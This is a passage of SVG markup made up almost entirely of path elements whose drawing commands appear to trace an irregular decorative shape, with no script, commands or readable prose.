d=\"M292.6,50.3c0-.1.1-.1,1.3-.1.9,0,1.7,0,1.3-.1-1.7-.1-1.7-.2-1.7-.4,4.9.3,5.2.1,5.5-.1,3.1.2,8.5.2,7.5.6,5.6-.1,6.9-.6,10.4-.9-6.6-.1-5.6.5-12.2.4,1-.4-8-.2-7.5-.6-.4-.5,6,.1,5.3-.3-.5-.4-4.5.1-4.3-.2,4.5-.1-3.2-.3-1.9-.6.8,0,5.2-.2,5.7.1s-1.7.2-2.5.3c2.5,0,4.4.1,5.8.2-.6-.4.5-1.1-7-1.7-3.2.2,2.3.3,1.9.6-5.6.2-7.9,0-4.5-.4-5.8-.1-4.5.5-.7.7a20.82,20.82,0,0,0-4.1.1c1.7.1,4,.1,4.4.2.2.2-.8.3-2.5.3-2.3-.3-4.8-.5-7.6-.7-2.3.1,4.4.8,6.2.7,0,.3,2.5.4,3.3.6-5.3-.1,1.5.5-4.1.1C294.3,49.7,288.5,50,292.6,50.3Z\"></path>\n <path d=\"M276.4,49.3c3.4-.1,7.9-.1,9.4-.3C281.2,49,277,49,276.4,49.3Z\"></path>\n <path d=\"M339.8,50.3c1.2-.2-5.2-.6-5.9-.4,6.9.2-.1.3-1,.4C337.4,50.6,335.4,50.1,339.8,50.3Z\"></path>\n <path d=\"M297.3,41.5c-1-.4-5.8-.9.4-1.1-7.9-.1-5.8-.8-9.4-1.2-7.5.2,8.4,1.2-.1,1.4a7.8,7.8,0,0,0-3-.3c-1.3.5,3.6,1.6-6.9,1.6,5.2.4,5.1.7-.7.7a114.26,114.26,0,0,0,13.6-.3c.3.2,4.8.2,4.5.4a32.67,32.67,0,0,0-3.8.5c2.5,0,4.4.1,5.8.2.9-.3-2.3-.3-1.9-.6,2.1.1,2.6.2,4.5.3.6-.4-3.4-.5-3.5-.8,2.7.1,4.8.2,5.9.3-2.5.6,10.4,1.4,5.7,1.8,5.7-.1,1.3-.7,3.4-.9-1-.2-6.7-.1-7.3-.4l-.3-.3a62.16,62.16,0,0,1,10.2.6c3-.2-4.4-.5-4.9-.9a16.86,16.86,0,0,1,5.3-.3c2.8.3,6.8.4,9,.7a61.84,61.84,0,0,1-7.2-.3c-.4.6,4.7.3,6.2.7.4.4-1.6.6-3.5.8,1.7.1,4,.1,4.4.2-6.7,1-1.8,2.8-9.1,3.8-1.7-.1-1.7-.2-1.7-.4-2.6,0-4.7,0-5.5.1,3.8.4,9.8.6,14.7.9.7.6-4.8-.1-5.3.3,3.6.3,7,.1,11.3.3-4.6-.5.2-.8-5.2-1.2-1.4.1-.1.4-4,.2a53.56,53.56,0,0,1,7.9-.5c-1.8-.5-2.2-1-1-1.1,2.7-.2,2.8.1,5.8.2.7-.4-7-.4-6.3-.8,2.6,0,4.7,0,5.5-.1-9.7-.1,6.2-.6-2.3-1-1.8.1-.2.5-3.8.5-1.1-.6,3.4-.8,6-1.1-1.7-.1-4-.1-4.3-.2,5.8-.3-1.3-1.1,2.5-1.9-6.6-.2-3-.4-3.4-.7-4.4-.2-4,.1-8.4-.1,2.7.5-.6.2-5.3.3-2.4-.8-9.2-1.2-14.1-1.8C297.4,40.6,302.3,41.3,297.3,41.5Z\"></path>\n <path d=\"M333.6,49.5c1.7,0-1.4-.5,5.4-.2,0,.2.7.4,1.6.3-.1-.2-.9-.3-1.7-.4-4.5-.2-5.3.1-8.5-.2C330.8,49.2,329.4,49.5,333.6,49.5Z\"></path>\n <path d=\"M367.4,48.5a78.32,78.32,0,0,0-8.1.3c.9.1,5.7.4,5.7.1C359.8,48.6,368.4,48.8,367.4,48.5Z\"></path>\n <path d=\"M275.4,46.6c4.2.1,10.6-.1,8.1-.3-2.5,0-3.7.2-6.8.2-.3-.2-.1-.4-3.1-.4C273.4,46.3,275.4,46.4,275.4,46.6Z\"></path>\n <path d=\"M302.7,46a24.32,24.32,0,0,1,2.7,0,4,4,0,0,0,1.6.3c-.1-.5,2.2-.9-5.1-1.1C304.7,45.5,302.5,45.9,302.7,46Z\"></path>\n <path d=\"M284.4,44.2c-5-.1-4.1.3-6.6.4,2.4,0,3.8.2,4.3.1C277.9,44.4,286.3,44.5,284.4,44.2Z\"></path>\n <path d=\"M364.1,44.8c-.4.3,2.8.3,1.9.6,7.1.2.5-.3,3.9-.4,3.2,0,1.9.4,4.5.4C375,44.8,366.4,45,364.1,44.8Z\"></path>\n <path d=\"M14.4,32.6l.2.2c8.3.1,1.3.7,3.6,1,0-.1.1-.1,1.3-.1.3.1,0,.3,1.7.4,2-.4-1.8-.9-2.7-1.5Z\"></path>\n <path d=\"M331.4,40.7c3.3.2,4.1-.4,7,0a20.27,20.27,0,0,0-2.7,0c9,0,1.7-.5,3.4-.9a61.71,61.71,0,0,0-6.8.2C338.5,40.4,332.5,40.6,331.4,40.7Z\"></path>\n <path d=\"M275.3,38.6c5,.3-1,.6,6.2.8-.7-.3-3.2-.5-.6-.7C277.9,38.8,275.4,38.3,275.3,38.6Z\"></path>\n <path d=\"M291.1,39.2c-.1-.1-.2-.3-.4-.4-2.1-.1-7.2,0-7.2-.3,1.2.1,2.7-.7-.8-.9-3,.3,2.4.9-2,.9C284.8,38.7,286.3,39,291.1,39.2Z\"></path>\n <path d=\"M347,39.6c2.6-.2-1.3-.5,1.4-.7-3.9.2-6.5,0-7.2.4C343.2,39.4,344.1,39.5,347,39.6Z\"></path>\n <path d=\"M284.9,36.9c1.6.1,10.2.7,8.8.5-4.1-.2-.6-.5.9-.5a33.9,33.9,0,0,1-4.5-.3c-2.5.1,2.2.4-2.4.4C286.1,36.9,285.4,36.7,284.9,36.9Z\"></path>\n <path d=\"M339.4,37.2c1.1,0-2.9-1.2-3.7-1.1C335.2,36.9,335.9,36.8,339.4,37.2Z\"></path>\n <path d=\"M356.1,37.3c-1.7-.1-1-.1-.2-.2a82.15,82.15,0,0,0-9.8-.1C348.7,37,355,37.3,356.1,37.3Z\"></path>\n <path d=\"M328.3,34c3.8-.4,6.4.2,11.2.1C338.9,33.6,326.7,33.5,328.3,34Z\"></path>\n <path d=\"M341.4,33.2c-.6-.5,9.6-.7,1.7-1.2C347.4,32.8,335.6,32.6,341.4,33.2Z\"></path>\n <path d=\"M145.4,77.3a2.39,2.39,0,0,0-.5-.6c-3.8-.3-4.9,0-7.2-.3.2-.2,2.2-.2,5.5-.1a19.89,19.89,0,0,0-6.5-1c1.7.7-4,.9.2,1.7C141,77.1,141.2,77.1,145.4,77.3Z\"></path>\n <path d=\"M231.3,75.4c-6.2-.2-7.8-.1-11.1,0,.9.2-1.2.5,1.9.6-.1-.1,1-.1,1.4,0a4,4,0,0,0,1.6.3C224.8,75.5,229.3,75.9,231.3,75.4Z\"></path>\n <path d=\"M212.5,69.8c-5.6.1-.3.7,2.3,1-.2.1-1.4.1-2.6.2-2.3-.1-.1-.5-4.6-.5,2.2.8.8.9-.1,1.4,5.7-.4,8.1.4,12.8.3-4.8-.3,8.1-.3,2.2-.7-2.2.2-5.9-.6-3.5-.8-2.1-.3-5.2,0-5.8-.2-2.3-.5,2.4-.5,5.4-.2a81.66,81.66,0,0,0-11.9-.9C205.7,69.6,211.8,69.6,212.5,69.8Z\"></path>\n <path d=\"M173,70.8c.1,0,.1-.1,0,0C173,70.7,172.9,70.8,173,70.8Z\"></path>\n <path d=\"M178.1,68.7c-11-.1-4.3,1.3-5.1,2a18.73,18.73,0,0,1,4.1,0c-4.4.4,3.2,1.3,3,1.8,1.1-.6,2.6-1.4-1.7-1.9,3.6-.1,2.4-.3.8-.6,2.5,0,4.5.1,5.8.2a66.74,66.74,0,0,0-11-1.4C176.3,68.9,179,69,178.1,68.7Z\"></path>\n <path d=\"M1494.6,118.8c1.9.1,2.8.2,5.8.2,1.1-.1,1.6-.3.9-.5C1497.4,118.5,1497.6,118.8,1494.6,118.8Z\"></path>\n <path d=\"M1495.9,117.1c1.1.5-1.1,1.2,5.3,1.3C1500.3,118,1504.4,117.5,1495.9,117.1Z\"></path>\n <path d=\"M1463.9,110.8c-6.5-.3-4.6.5-.9.5C1462.3,111.1,1462.9,110.9,1463.9,110.8Z\"></path>\n <path d=\"M1495,109.8c-2.4.1-.2.6,2.1.8C1496,110.3,1498.2,109.9,1495,109.8Z\"></path>\n <path d=\"M1692,112.7c.1.8-2.5-.3-7.2-.3a38.09,38.09,0,0,0,6.3.8,10.17,10.17,0,0,1,2.7,0C1693.4,113,1693.9,112.7,1692,112.7Z\"></path>\n <path d=\"M1463,106.5c-4.5-.1-4.6.2-5.2.4a16.67,16.67,0,0,0,4.7.7c.9-.3-2.5-.4-3.3-.6,3.2.1,5.3.1,5.5-.1C1463,106.8,1463,106.7,1463,106.5Z\"></path>\n <path d=\"M1472.4,99.9c-3-.2-1.8,0-5.7-.1,1,.3,1.1,1.1-3.7.6,6.8,0-.4-.9,3.2-1.1a38.82,38.82,0,0,0,5.9.3c-1.2-.4-.2-.3-4.7-.7,1.8-.3,6.5.4,5.5-.1-.2-.4-4.4,0-3.3-.6,4.3.3,3.6-1-2.5-1.3,0,.5-1.5.6,2.3,1-11.1,1.2-12.1,3.5-6.2,5.5-2.9.1-2.9.4-5.1.5,4.5.8-4.6,2,4.8,2.3-2.8-1,1.5-2.4.9-3.7-.3-.6-4.1-1.4,1.4-1.5-.3.1-1.8.2-1,.4,8.9.1-.5-.8,3.4-.9.9.4,3.9.2,1.9.6,3.8.1,3.5-.1,3.9-.3C1470.8,100.6,1469.7,99.9,1472.4,99.9Z\"></path>\n <path d=\"M1701.7,100a23.82,23.82,0,0,1-2.8-.1,20.27,20.27,0,0,0-2.7,0c-3.3,1.9-8,3.1-7.5,5.7,2.3.2,6.1.3,7.5.6-7.8-.4-.8.9-8.1.3-.7.5-.9.9,2.6,1.4-1.6-.6,3.5-.1,5.6,0-.3-.2,0-.3,1-.4-2.4-.3-6.1-.2-7.3-.4,1.5-.4,4.7-.2,9.3-.4-3.1-.5.2-.5.6-.9-8.1-.2-1.1-.8-5.2-1.2,1.8,0,1.8-.1,4.2,0-2.2-.4-.9-.8.4-1.1-1.7-.1-3.3-.2-4.5-.3C1701.6,102.1,1696.9,100.8,1701.7,100Z\"></path>\n <path d=\"M1710.2,106.5c-3.6-.1-5.3,0-5.3.3,2.6.1,3.1.2,1.6.3,1.4,0,2.8.1,4.2.1C1709.2,106.8,1709.2,106.8,1710.2,106.5Z\"></path>\n <path d=\"M1705,103.8c1.4.4-1.3.5-.6.9C1710.6,104.9,1709.3,103.9,1705,103.8Z\"></path>\n <path d=\"M1697.2,99.7c-.1-.4,2.4-.6,6.4-.6C1698.4,98.6,1692,99.5,1697.2,99.7Z\"></path>\n <path d=\"M1653.7,97.6c1.4.4-5.1.7-.4,1.1C1652.9,98.3,1657.8,98,1653.7,97.6Z\"></path>\n <path d=\"M1326.8,90.8c1.4,0,2.8.1,4.2.1.4-.2,2.7-.5-2-.7C1328.4,90.4,1325.8,90.4,1326.8,90.8Z\"></path>\n <path d=\"M1684,97.3c0,.3.9.6,3.4.7C1686.4,97.8,1689.1,97.3,1684,97.3Z\"></path>\n <path d=\"M1696.1,95.3c10.3.3.8-.7,4.6-1.1C1692.8,94.2,1699.1,94.9,1696.1,95.3Z\"></path>\n <path d=\"M1742,95.2c-1.3.1-2.4.6.7.8C1743.9,96,1745,95.4,1742,95.2Z\"></path>\n <path d=\"M1715.4,93.4c1.1.1,2.8.1,3,.2-1.1,0-1.6.1-1.2.2,3.8.1,3.5-.1,3.9-.3C1717.4,93.4,1716.3,93.1,1715.4,93.4Z\"></path>\n <path d=\"M1742.4,91c.9.2-1.1.5,1.9.6C1746.4,91.5,1748.7,91.1,1742.4,91Z\"></path>\n <path d=\"M1711.2,90.3c2-.1,1.8-.7-3.4-.7C1709.3,89.8,1708.8,90.1,1711.2,90.3Z\"></path>\n <path d=\"M1741.4,88.2c-3.6-.1-5.1.5-2.2.6C1739.7,88.6,1742.4,88.6,1741.4,88.2Z\"></path>\n <path d=\"M1738,87.6a8.94,8.94,0,0,0,3.2.5c.3-.2,1.5-.5-.6-.7A6.92,6.92,0,0,1,1738,87.6Z\"></path>\n <path d=\"M1729.4,85.7c-.9.3,2.5.4,4.7.5C1735.7,85.9,1734.6,85.6,1729.4,85.7Z\"></path>\n <path d=\"M1877.1,86.3c4,.1,3.8-.2,3.7-.5C1876.4,85.7,1876.5,86,1877.1,86.3Z\"></path>\n <path d=\"M1704.4,77.8c1.4,0,2.8.1,4.2.1-1-.4,3-.4-1.9-.6C1708.1,77.7,1703,77.4,1704.4,77.8Z\"></path>\n <path d=\"M1724.7,72.5a26.77,26.77,0,0,1-4.2,0c5.2.5,1.9.9,6.7,1.2C1726,73.3,1728.1,72.7,1724.7,72.5Z\"></path>\n <path d=\"M1811.9,73.8c0,.2-3.8.8,2.2.9C1813,74.4,1815.2,73.9,1811.9,73.8Z\"></path>\n <path d=\"M1705.8,71.5c4.2.1,3.2.6,6.3.8-1.3-.4,5.9-.5.5-1C1715.2,71.8,1705.3,71.2,1705.8,71.5Z\"></path>\n <path d=\"M1801.3,72.8c-5.2-.4-2.3-.7-6.3-.9.2.6,3.4,1,5.4,1.4C1798.9,73,1802.1,73.1,1801.3,72.8Z\"></path>\n <path d=\"M1719.7,71.5c.2-.2,2.6-.7-1-1.1C1718.2,70.6,1716.4,71.1,1719.7,71.5Z\"></path>\n <path d=\"M1711.3,69.9c-2.5,0-4.4-.1-5.8-.2-.8.4,3.2.6,3.6,1-2-.1-2.5-.2-4.4-.3l.2.2c-.9,0-1.7,0-1.3.1,4.5,0,2.3.4,6,.5,3.6-.4.4-.6-1-1.1C1709.6,69.9,1711.4,70,1711.3,69.9Z\"></path>\n <path d=\"M1864.6,72c-3.3-.1-5.4-.1-7,0,.3.1,0,.3,1.7.4C1858.3,72,1866.3,72.5,1864.6,72Z\"></path>\n <path d=\"M1725.4,68.6c.2-.5-1.5-.8-7.8-.9.4.2-.1.4,1.8.5C1723.9,67.7,1721.5,68.5,1725.4,68.6Z\"></path>\n <path d=\"M1814.1,68.4c-3.8.1-7,.2-9.4.4,4.5.2,2.9-.3,8.3,0C1812.8,68.6,1813.1,68.5,1814.1,68.4Z\"></path>\n <path d=\"M1758.3,63.3c-1.3.2-6.2.5-.7.7a10.17,10.17,0,0,1,2.7,0C1755.2,63.5,1762.2,63.7,1758.3,63.3Z\"></path>\n <path d=\"M1911.3,66.7c3.6-.1,3.2-.7-2.2-.9C1910.8,66.1,1907.6,66.5,1911.3,66.7Z\"></path>\n <path d=\"M1866.7,65a26.2,26.2,0,0,1-2.8-.1c-.9,0-1.6,0-1.3.1,4.7.1-3.8.4,3.2.5C1864.3,65.2,1867.5,65.3,1866.7,65Z\"></path>\n <path d=\"M1854.4,63.6c0,.1.5.8,1.8.5-2.4-.5,8.7-.2,2.1-.7C1858.8,63.6,1857.5,63.7,1854.4,63.6Z\"></path>\n <path d=\"M1836.4,63.8c.7-.2,4.7-.6-.7-.8,1.5.4-.9.4-2.3.5A21.47,21.47,0,0,1,1836.4,63.8Z\"></path>\n <path d=\"M1810.8,61.5c.3.2.2.4,3.1.4-.2-.2-.3-.4-.5-.6-4.5,0-3.2-.4-6-.5-.4.2-3.9.1-2.3.5A27.87,27.87,0,0,0,1810.8,61.5Z\"></path>\n <path d=\"M1865.5,60.5c.1.1.3.1,1.5.1l-.4-.4c-2.7,0-6.1-.1-5.4.2A41.15,41.15,0,0,1,1865.5,60.5Z\"></path>\n <path d=\"M1726.5,52.4c-.3-.4,3.6-.4,5-.7C1725.3,51.5,1722.5,52.1,1726.5,52.4Z\"></path>\n <path d=\"M1768,50.6a4.37,4.37,0,0,0,1.6.3c.9-.3-4.5-.8-6.1-.6C1766.5,50.4,1764.4,50.9,1768,50.6Z\"></path>\n <path d=\"M1743.9,50.1c.4-.3,4.1-.4,3.5-.8C1743.5,49.2,1741.8,49.9,1743.9,50.1Z\"></path>\n <path d=\"M1757.7,48.4c-4.3-.1-5.3.1-8.2.1a10.29,10.29,0,0,0,3.3.6C1753.2,48.8,1758.9,49,1757.7,48.4Z\"></path>\n <path d=\"M1716.4,47.3c-.8.3-1.1,1,5.2,1.2C1719.6,48.1,1718.9,47.7,1716.4,47.3Z\"></path>\n <path d=\"M1708.9,48.2c0-.3,5.4-.6,2-.8-1.6.4-.5-.3-3-.3-.8.3-.2.8-4.7,1C1707.1,48.2,1705.9,48,1708.9,48.2Z\"></path>\n <path d=\"M1777.5,48.8a45.38,45.38,0,0,0,4.9.9C1784.6,49.5,1783.6,48.8,1777.5,48.8Z\"></path>\n <path d=\"M1861.2,50.9c-1.6.1-5.2.1-7,0C1853.6,51.5,1865.8,51.2,1861.2,50.9Z\"></path>\n <path d=\"M1742,48c2.5-.2,5-.1,2.3-.5C1740.8,47.3,1738.8,47.8,1742,48Z\"></path>\n <path d=\"M1786.2,47.8c1,.4,2.4.7,6.4.9C1791.3,48.3,1790.3,48,1786.2,47.8Z\"></path>\n <path d=\"M1746,46.2c.8-.3,1.6-.6-2.1-.8C1745.5,45.8,1740.4,46,1746,46.2Z\"></path>\n <path d=\"M1747.7,43.4c.8,0,2.9-.5-.5-.6a15.43,15.43,0,0,1-2.8-.1C1744.5,43.1,1745.6,43.3,1747.7,43.4Z\"></path>\n <path d=\"M1744.9,41.7c-.3,1.1,21.2.6,9.6-.1-1.9,0,2.3.6-2.3.6C1749.7,42.1,1747.9,41.8,1744.9,41.7Z\"></path>\n <path d=\"M1685.2,119.2c-.9.1-5.1.4-.8.6-.1-.1,2.4,0,2.6-.2-1.6-.1-2.3-.2-3-.3C1686.3,119.4,1687.7,119.3,1685.2,119.2Z\"></path>\n <path d=\"M1686.5,111.1a45.79,45.79,0,0,1,7.4.5,14.06,14.06,0,0,1-3.6-1C1685.9,110.5,1687.6,111,1686.5,111.1Z\"></path>\n <path d=\"M1699.9,98c-5.9-.4,1.2-.8-5.1-1.1,0,.3,1.9.8-2.2.7a9.4,9.4,0,0,0-3.2-.5c-.3.4,3.6.7,6.1.6.6.2-1.7.2-2.5.3C1695,97.9,1700.4,98.2,1699.9,98Z\"></path>\n <path d=\"M1453.3,87.6c-.1-.1,1-.1,1.2-.2-5-.1-1.5.5-.8.6,0-.2,3.5,0,2.5-.3A7.86,7.86,0,0,1,1453.3,87.6Z\"></path>\n <path d=\"M1744.1,85c-4.3.5-10.5-1.5-16.4-1.2,7.8.5,7.6,1.4,16.9,1.8C1742.5,85.3,1748.3,85.2,1744.1,85Z\"></path>\n <path d=\"M1702.2,81.7h0c-9.7.5-1.9,1.9-5.1,2.1,1.6,0,3.3.2,4.9.3a22.85,22.85,0,0,0,3.7,0c-1.6-.1-2.8-.2-3.7-.3-2.9-.4-1.8-1.1,0-1.4a11,11,0,0,1,1.9-.2C1698.9,81.9,1706.6,81.7,1702.2,81.7Z\"></path>\n <path d=\"M1878.8,85c2.1.4-5,.5-.7.7a17.63,17.63,0,0,1,3.9-.4c.1.3-2.4.3,1.8.5C1886.6,85.7,1881.6,85.2,1878.8,85Z\"></path>\n <path d=\"M1710.6,81.8c-3-.1-1-.4-1.9-.6C1699.7,80.9,1708.5,82.1,1710.6,81.8Z\"></path>\n <path d=\"M1864.2,74.7c4.5.1,11.5.6,13,.5-5.8-.3-12.8-1.1-6.8-1.4-4.7-.2-.8.3-5.5.1.3-.1,1.8-.2,1-.4a31,31,0,0,0,4.2.1c-1.9-.4,2-.2,2.4-.4-8.4-.3-4,.6-13.7.2-7.6.9,3,2.8-3.5,3.8,2.2.3,2.9.1,4.4.3-4.5.1.1.4-2.1.7a41.63,41.63,0,0,1,6,.5c-2.8-.1-1.5.3-5.5.1-2.5-.1-.4-.5-3.3-.6.8.3-3.8.5-.8.6a98.15,98.15,0,0,1,10,.3c3.9-.6-.1-1.3-4.5-2,.1.1-1,.1-1.4,0,3.3.1,1.3-.3,4-.2s2.4.6,4.8.8a21.32,21.32,0,0,1,4.3.1c-5.7-1.4.5-1.9-8.1-2.9-.1.1.5.3-1.1.3C1861.8,75.1,1862.3,74.8,1864.2,74.7Z\"></path>\n <path d=\"M0,0V30.7c.9,0,1.9,0,3.1.1l.4.4c13.8.4,10.5-.4,11.6-1,12.1.7,5.8,1.4,4.9,2.4a27.94,27.94,0,0,0,6.9-.1c8.1.9-6.5,1.7,5.1,2.6.3-.3,1.4-.6,3.4-.9.4,2-2.5,2.8,0,4.8-2-.1-2.5-.2-4.4-.3,1,.5,6,.7,6.7,1.2-1.7,0-4-.1-4.1,0,2.2.1,1.2.3.3.3,4.7.2,1.6-.3,5.4-.2,6.6.8.6,1.5,6.4,2.5-4,.1-3.4.6-6.2.8,6.4.3,8.8.1,11.7.6-6.2.1-12.2.4-17-.4.1.2-3.9,0-4.1.1,7.4.1,6.3.8,6.8,1.4,6.2.1,7.2.9,3.5.8,3.1.2,5.3.4,4.8.8-7,.3-7.5-.5-10.2-.6,1.1.3-1,.8,2.3,1,1.2-.6,2.7.6,8.5.2.2-.2-3.3-.2-4.6-.5,5.4.1,7.6.3,8.9.6-1.4.4-10.5.1-12.4.2,2.4.3-2.8.7,3.8,1.2-4.2-.6,1-1.3,7.6-.8.8.5-5.4,0-5.4.2,1.9.3,5.4,1.1-3.6.7,2.4.5,5.6.5,10.1.4,1,.5-4.4.3-6.9.1,1.3.3-2.6.2-2.4.4,4.3.3,7.7,0,11.3.3-.2.2-3.6.1-5.4.2,1.4.4,5.6.7,5.2,1.2-9.4,0,.6.7-7.5.9,3.5.1,4.3-.1,5.8.2-.2.2-5.2,0-5.4.2,3.5.1,6.9.1,7.3.4-.9,0-1.6,0-1.3.1-1.46-.17-2.93-.27-4.4-.3,5.4,1.5,6.2,1.8-3.4,2.4,6.2.3,4.5.9,2.4,1.1,4.4,0,4.5.3,7.3.4-1.9-.6,3.9-.2,6.9-.1,1.8-.4-.6-.6,2-.9-4.5-.1-3.8-.5-6.2-.7,3.2,0,4.6-.2,6.7-.3-3.4-.1-5.3-.9-3.6-1,3.5.2-.1.8,6.3.8-3.2-.6,1.6-.4,4.1,0,.1-1.4.4-1.3-2.2-2.6,3.3,0,6.2.4,8.6.3-7.9-.4,1.2-.9,1.6-1.4.4.2-.1.4,1.8.5,4.2-.1-.6-.3,3.9-.4a8.16,8.16,0,0,0,2.7,0c-4.5-.3-5.6-.2-8.7-.4.4-.9,2.8-2.3,16-2.4-3.9.4,4,1-1.6,1.4,3.4,0,3.3.3,7.2.3,1.8-.6,1.3-1.1,4-1.8a13.45,13.45,0,0,0,4.2,0c-1.7-.1-3.4-.1-3-.3a13.45,13.45,0,0,0,4.2,0c-2.7,0-5-.6-1.9-.6,1.5.7,8.8.3,11.8.8.5.5-8.1.1-5.2.4.8-.1,4.4.2,5.5-.1.9.2,6,.7,2.1.8a44.26,44.26,0,0,0-8.3,0c4.7-.1,8.5.1,11.3.3.3.5,2.4,1.2-3.2,1.1a55.14,55.14,0,0,0-5.9-.4c-1.8.3,4.9.2,4.5.4.4.2-.2.4,1.8.5,3.3-.1-2.8-.5,2.3-.5-.8.4,2.5.5,2.1.8-4.2-.1-4.1.2-8.3,0,.8-.3-5.5-.3-5.8-.2,2.3,0,1.7.8,4.5.4-1.4,0-2-.2-.2-.2.2.2,4,.2,4.4.3-1.5.1-1.4.4-3.8.5-2.3-.1-1.1-.3-3.1-.4-4.8.2,11.3,1.2-.4,1.1-.9-.2,1.2-.5-1.9-.6-4.3.3.3.8-3.2,1.1,3.2,0,5.4.1,5.9.4-4.2-.1-5.4.3-2.2.6-2.7.2-4.7-.2-7,0,3.8.1,3.6.7,4.8.8,0-.1.2-.3,2.6-.2,2.8.3-.9.3.6.7,5.3.2,2-.4,5.2-.4-.9.6,4.4.2,4.3.2,5.7.4-1.8.6-5.1.5,5.5,0,10.2.6,11.3.1-6-.3,2.2-.4-3.5-.8,3.3.1,5.3.1,5.5-.1-3.1-.3-5.9.1-7.3-.4,1.7-.9,14.3.1,13.1.7,2.7-.2,1.8-.2.8-.6,4.9.5,3.1-.1,5.4-.2,3.3.3-.1,1.1,5.3,1.3-.3-.7-1.8-1.4-.1-1.6,7.8.6,4.1,1.4,9,2.3-3.3-.1-5.3-.1-5.5.1,3,.3,2.4.9,5.2,1.2-6.1-.1-2.8.6-2.1.8,1.2-.1,10.6.2,6.8-.2.6.2-4.1-.1-4.3-.2a7,7,0,0,0-1.7-.4c6.7,0,.8-.6,6.4-.6-2.7-.1-3,.1-5.6,0,3.6-1.1,2.1-1.4,3.7-2.1-5.2-.7-7.4-1.9-2.1-2.3a36.81,36.81,0,0,1-4.2-.1c4.8-.1.5-.5.5-1,2.7,0,6.1.1,5.4-.2-6.8,0-4.7-.6-1.9-.6a15.66,15.66,0,0,1-2.9-.2c4,0,5.7.7,7.3.4-3-.1-.8-.5-4.7-.5-.8.1-2.9.1-5.5.1-.3-.3-.5-.6-.8-.9-4.9.1-7.9-.3-9.6.1,3.4.1,2.9-.1,7,0-.2.3,1.2,1-4.9.8,4.4.1-2.6,1.2,4.9.9,0,.2-.6.4-2.4.4-4.5,0-6.7-.2-10-.3a19.29,19.29,0,0,1-3.7.6c-.2-.2-4-.2-4.4-.3,1.6-.2-4.6-.6-.5-.6,2.7.1,1.3.4,4.5.4-.4-.3,4.2-.2,2.2-.7-7.8-.4-10.8-2-1.4-1.6-3.2-.6-2.8-.8-7.4-.5,2.5-.4.2-1.1-3.7-1.1,2.7,0,.7-.3,4-.2,2.9.1-.3.6,4.7.7,4.1.1-1.9-.8,2.2-.7-.2.3,5.6.2,4.6.5-4.3-.3-4.6.1-2.4.4-2.7-.3-4.9-.1-4,.2a36.19,36.19,0,0,1,8.7.4c-.6-.7,1.3-1.3,1.2-1.8-.5.2-3.1-.4-6-.5-2.6-.9,3.7-.9,1.2-1.8,2.4.4,5.6-.1,7.2.3-4.3-.1-3.3.8-2.1.8a15.37,15.37,0,0,1,2.8.1c-5.2-1.2,11.7-1,9.7,0a52.3,52.3,0,0,0-5.6,0c1.1.3-1.6.7,3.4.7-3-.9,6.9-.1,10.6-.6-.7-.1-6.1-.1-7.4-.5,3.4-.2,8.1.3,9.8.1-2-.4-6.1-.3-8.8-.5.5-.4,4.6-.6,6.9-.1-.5-.3.3-.4,2.3-.5.1.1,2.6.2,3.1.3.2,1-.3,1.7-1.5,2.4.8-.1,2.1-.1,2.2.1-.1.3-1.4.5-3.7.6,5.7.1,3.2.1,3.1.4,2.7.1,3-.1,5.6,0,.4.7,4.7,1.3,0,1.5a82.23,82.23,0,0,0-11.1,0c-5.7-.9,2-1.7-.7-2.3-3.4.1-2.3.7-6.3.7-.4-.8,7-.9,7.1-1.4a73,73,0,0,0-12,.6c-8.2,0-2.8-1-11-1.4,1.3.6,3.9,1.3,10,1.9-6.8.2-5.2.7-7.2,1.3,5.5-.1.8-.3,8.4.1,1.7-.2-4-.5-.4-.4s2.8.6,6.3.8c-2.3.2-2.9.3-.8.6,3.4.1,5.3-.5,9.7,0-3.8.4.5.2,2,.7-1.3.3-4.8-.1-5.3.3,4.5,0,8.1.8,4.9.9-2.7-.1-1.3-.4-4.3-.2,6.3.5,1.5.8,7.8.9-4.2.4,2,.7-1.8,1.2,3.7.2,4.4,0,5.8.2-4.6.2,6.1.7.8.9-.3-.1,0-.3-1.7-.4,2,.7-5.3-.1-5.3.3,9.2.5,10.2,2.1-3,1.4,1-.2-1.8-.7-3.1-.4,2.1.1,1.5.3,1.8.5,7.2.4,11.5.7,7.9,1.1-1.6-.1-6.9-.6-8.6-.3,7,.2-1.4.4-.8.6a53.87,53.87,0,0,1,8.8.5c2.1,0,5.4-.4,6.8-.2.1.3-2.3.3.5.6-1.9,0-3.8-.1-5.7-.1,8.3,1.1,3.6,1.5,2.1,2.3,5.1.2.2.4,3.3.6a13.76,13.76,0,0,1,4.1-.1c1.5.5-6.6.4-2,.9-3.2-.1-5.3-.1-5.5.1,5.4.1,1.4.5,7.3.4-2.8.2.7.4,2,.7,4.9-1.5-2.8-3.3,4.1-4.8a36.81,36.81,0,0,1-4.2-.1c-.9-.5,4.3-.6,1.8-1.2-6.7-.2,1.3.4-2.5.3-5.1-.5-2.2-.8-2.6-1.4a43.87,43.87,0,0,0,5.5-.1c-.8.4-6.2.4-.6.8-.5-.3,3.8-.6.7-.9,1.2-.1,1.3-.3-.4-.5.1.3-4.7-.1-4.4-.2,2.8-.3-3.1-.7,2.1-.7.5.4-.6.8,4.9.9-.1-.7-1.3-1,1.7-1.3-3.1,0-4.6-.2-4.5-.4,7.5-.2-1.9-1.3-4.2-1.6,3.7-.1,5.6-.3,7.9-.5a36.81,36.81,0,0,1-4.2-.1c0-.3,3.3-.4,5.1-.5-7.7-.2-3-.4-6.4-1,2,.1,2.5.2,4.4.3.6-.4-2.7-1.1.3-1.2a33.79,33.79,0,0,1,4.5.3c1.4-.1.1-.4,4-.2-1.5-.2-1-.6-3.4-.7-3,.1-2.7.6-7.9.5,1.7-.4,2.9-.1-1.8-.5,4.1,0,4.6-.5,8.4.1-.2-.3-1.4-.7,2.3-.6,1.3.3,3.4.5,3.5.8a43.14,43.14,0,0,1,8.8.5c1.9-.3-1.5-.6-4.9-.9a13.45,13.45,0,0,1-4.2,0c1.9-.2-1.8-.4,2.4-.5-2.1-.1-5.2-.1-5.8-.2.6-.1,1.3-.2,2.5-.3,8.9.5,11.6,1.1,12.7,1.8,2.1.1,7.2,0,7.2.3-1.9,0-1.1.2-2.6.2-4.9,0-7.5-.4-8.4-.1,15.2.5,10.2,1.8,7.5,2.2-.1.3,3.8-.2,4.4.2-.7.4-3.7.9-1.7,1.3-1.6,0-4.1-.1-4.1,0,10.7.6-1.5,1.9,3.5,2.4-.2-.1.4-.3,1.3-.1.5.4-7,0-6.6.4,3.4.2,5.8-.3,7,0-4.7.1.2.1,1.8.5-3,.1-2.2.6-5.2.4,10.3,1-1.4,1